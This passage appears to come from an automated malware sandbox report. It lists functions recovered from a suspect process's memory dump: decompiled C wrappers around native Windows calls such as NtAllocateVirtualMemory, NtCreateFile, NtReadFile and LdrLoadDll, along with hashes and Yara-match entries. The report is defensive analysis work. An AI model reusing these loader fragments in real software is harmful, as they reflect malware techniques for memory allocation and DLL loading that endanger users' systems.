                                                                                                                                                    • Opcode Fuzzy Hash: 3bc95cc17d5a2cf010c9cbb611e3294351af47f2d3f07930dba50ef40a10354a
                                                                                                                                                    • Instruction Fuzzy Hash: 33F0F4B2200208ABCB04DF99DC91EEB77A9AF8C314F058248FE1D97241CA30EC11CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00418270, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileRead
                                                                                                                                                    • String ID: R=A$R=A
                                                                                                                                                    • API String ID: 2738559852-3742021989
                                                                                                                                                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                    • Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
                                                                                                                                                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                    • Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041831A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41filenativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileRead
                                                                                                                                                    • String ID: R=A
                                                                                                                                                    • API String ID: 2738559852-4215937652
                                                                                                                                                    • Opcode ID: 25c2477f0578a22a6c5c70e1a0f0fec5a8b830f87acfd3207ae74e9c157d6bfa
                                                                                                                                                    • Instruction ID: db6f611f201b5ff76dc7d72d112885db939561c6fce4b5ddb98ab49daad2e5e9
                                                                                                                                                    • Opcode Fuzzy Hash: 25c2477f0578a22a6c5c70e1a0f0fec5a8b830f87acfd3207ae74e9c157d6bfa
                                                                                                                                                    • Instruction Fuzzy Hash: AEF049B6200108AFCB14DF99DC40DEB77A9EF88320F108649FA1D97280CA30E8508BA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041841A, Relevance: 1.6, APIs: 1, Instructions: 53memorynativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2167126740-0
                                                                                                                                                    • Opcode ID: 2fbd8eca8f0d661bc804492f962c65bd68f3bfd03453813afd5658788dee58e0
                                                                                                                                                    • Instruction ID: edfe91a1534d6eabfe874913806b36666789abae1edceba7c0df1ee940c9a8e4
                                                                                                                                                    • Opcode Fuzzy Hash: 2fbd8eca8f0d661bc804492f962c65bd68f3bfd03453813afd5658788dee58e0
                                                                                                                                                    • Instruction Fuzzy Hash: 070157B1200208ABCB14DF99DC85DEB77ACAF88610F14869DF9089B242CA30E850CBE0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00409B20, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00409B20(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AB50( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF70(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B1F0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419300(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                                                                                                    0x00409b3c
                                                                                                                                                    0x00409b3f
                                                                                                                                                    0x00409b44
                                                                                                                                                    0x00409b49
                                                                                                                                                    0x00409b53
                                                                                                                                                    0x00409b58
                                                                                                                                                    0x00409b5b
                                                                                                                                                    0x00409b5d
                                                                                                                                                    0x00409b65
                                                                                                                                                    0x00409b6a
                                                                                                                                                    0x00409b6a
                                                                                                                                                    0x00409b71
                                                                                                                                                    0x00409b79
                                                                                                                                                    0x00409b7c
                                                                                                                                                    0x00409b7e
                                                                                                                                                    0x00409b92
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00409b94
                                                                                                                                                    0x00409b9a
                                                                                                                                                    0x00409b4e
                                                                                                                                                    0x00409b4e
                                                                                                                                                    0x00409b4e

                                                                                                                                                    APIs
                                                                                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Load
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2234796835-0
                                                                                                                                                    • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                    • Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
                                                                                                                                                    • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                    • Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004181C0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E004181C0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DC0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                                                                                                                    0x004181cf
                                                                                                                                                    0x004181d7
                                                                                                                                                    0x0041820d
                                                                                                                                                    0x00418211

                                                                                                                                                    APIs
                                                                                                                                                    • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                    • Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
                                                                                                                                                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                    • Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004181BF, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E004181BF(intOrPtr __edx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				intOrPtr _v117;
				long _t22;
				void* _t33;

				_v117 = __edx;
				_t16 = _a4;
				_t4 = _t16 + 0xc40; // 0xc40
				E00418DC0(_t33, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t22 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t22;
			}






                                                                                                                                                    0x004181bf
                                                                                                                                                    0x004181c3
                                                                                                                                                    0x004181cf
                                                                                                                                                    0x004181d7
                                                                                                                                                    0x0041820d
                                                                                                                                                    0x00418211

                                                                                                                                                    APIs
                                                                                                                                                    • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                    • Opcode ID: 16b2af6f4a591d3dfd2d1ca1a365b7bf1686fd21e6d08d76840a50c7c6bcaeba
                                                                                                                                                    • Instruction ID: 83197e33350ab80e0b22453d681ab6f626e3f7e42f9ce8b733784f3fa2032f29
                                                                                                                                                    • Opcode Fuzzy Hash: 16b2af6f4a591d3dfd2d1ca1a365b7bf1686fd21e6d08d76840a50c7c6bcaeba
                                                                                                                                                    • Instruction Fuzzy Hash: 4301B2B2200208AFCB48CF98DC85EEB77A9AF8C354F15824DFA0DD7241C630E851CBA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041839A, Relevance: 1.5, APIs: 1, Instructions: 34memorynativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2167126740-0
                                                                                                                                                    • Opcode ID: 293ef8066cc8a43bd6b15689a5aa6bfdd3585c3cd61ae5965657bd694355d1f9
                                                                                                                                                    • Instruction ID: a6ea97e564cfa4784b00443735e850fa342249bd65f80f46e3c4a39265dcb636
                                                                                                                                                    • Opcode Fuzzy Hash: 293ef8066cc8a43bd6b15689a5aa6bfdd3585c3cd61ae5965657bd694355d1f9
                                                                                                                                                    • Instruction Fuzzy Hash: 1AF0D4B6214208ABCB14DF89DC81EE777A9AF8C654F158549FA1997241CA30E911CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004183A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 20%
                                                                                                                                                    			E004183A0(void* __ebx, signed int __ecx, signed int* __edx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				intOrPtr _t11;
				long _t15;
				void* _t24;

				_t11 = _a4;
				 *(__ebx + 0x6a561048) =  *(__ebx + 0x6a561048) | __ecx;
				 *__edx =  *__edx ^ __ecx;
				_push(__ecx);
				_t4 = _t11 + 0xc60; // 0xca0
				_push(_t11);
				E00418DC0(_t24);
				_t15 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t15;
			}






                                                                                                                                                    0x004183a3
                                                                                                                                                    0x004183a5
                                                                                                                                                    0x004183ab
                                                                                                                                                    0x004183ae
                                                                                                                                                    0x004183af
                                                                                                                                                    0x004183b6
                                                                                                                                                    0x004183b7
                                                                                                                                                    0x004183d9
                                                                                                                                                    0x004183dd

                                                                                                                                                    APIs
                                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2167126740-0
                                                                                                                                                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                    • Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
                                                                                                                                                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                    • Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004182EA, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                    			E004182EA(void* __ecx, void* __esi, intOrPtr _a4, void* _a8) {
				long _t9;
				void* _t13;

				asm("arpl [edi-0x1374aaf2], dx");
				_t6 = _a4;
				_t3 = _t6 + 0x10; // 0x300
				_t4 = _t6 + 0xc50; // 0x409743
				E00418DC0(_t13, _a4, _t4,  *_t3, 0, 0x2c);
				_t9 = NtClose(_a8); // executed
				return _t9;
			}





                                                                                                                                                    0x004182ed
                                                                                                                                                    0x004182f3
                                                                                                                                                    0x004182f6
                                                                                                                                                    0x004182ff
                                                                                                                                                    0x00418307
                                                                                                                                                    0x00418315
                                                                                                                                                    0x00418319

                                                                                                                                                    APIs
                                                                                                                                                    • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Close
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3535843008-0
                                                                                                                                                    • Opcode ID: 1dca327da4914f1c760f7d67deea9c915382c65cea6f5937df3c4bd8022f8101
                                                                                                                                                    • Instruction ID: 9231b874e7649c0518a422970b631f3d7c59e0f03752c1b25ab94d79046153b4
                                                                                                                                                    • Opcode Fuzzy Hash: 1dca327da4914f1c760f7d67deea9c915382c65cea6f5937df3c4bd8022f8101
                                                                                                                                                    • Instruction Fuzzy Hash: 5CE08C31200210ABE714EFA4CC86EE7B768EF44350F10489EF9589B241EA30B9108790
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004182F0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E004182F0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409743
				E00418DC0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                                                                                                                    0x004182f3
                                                                                                                                                    0x004182f6
                                                                                                                                                    0x004182ff
                                                                                                                                                    0x00418307
                                                                                                                                                    0x00418315
                                                                                                                                                    0x00418319

                                                                                                                                                    APIs
                                                                                                                                                    • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Close
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3535843008-0
                                                                                                                                                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                    • Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
                                                                                                                                                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                    • Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C600C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                    • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                                                                                    • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                    • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C60048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                                                                    • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                                                                                                                    • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                                                                    • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C60078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                                                                    • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                                                                                                                    • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                                                                    • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C5F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                    • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                                                                                    • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                    • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C5F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                    • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                                                                                    • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                    • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C5FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                    • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
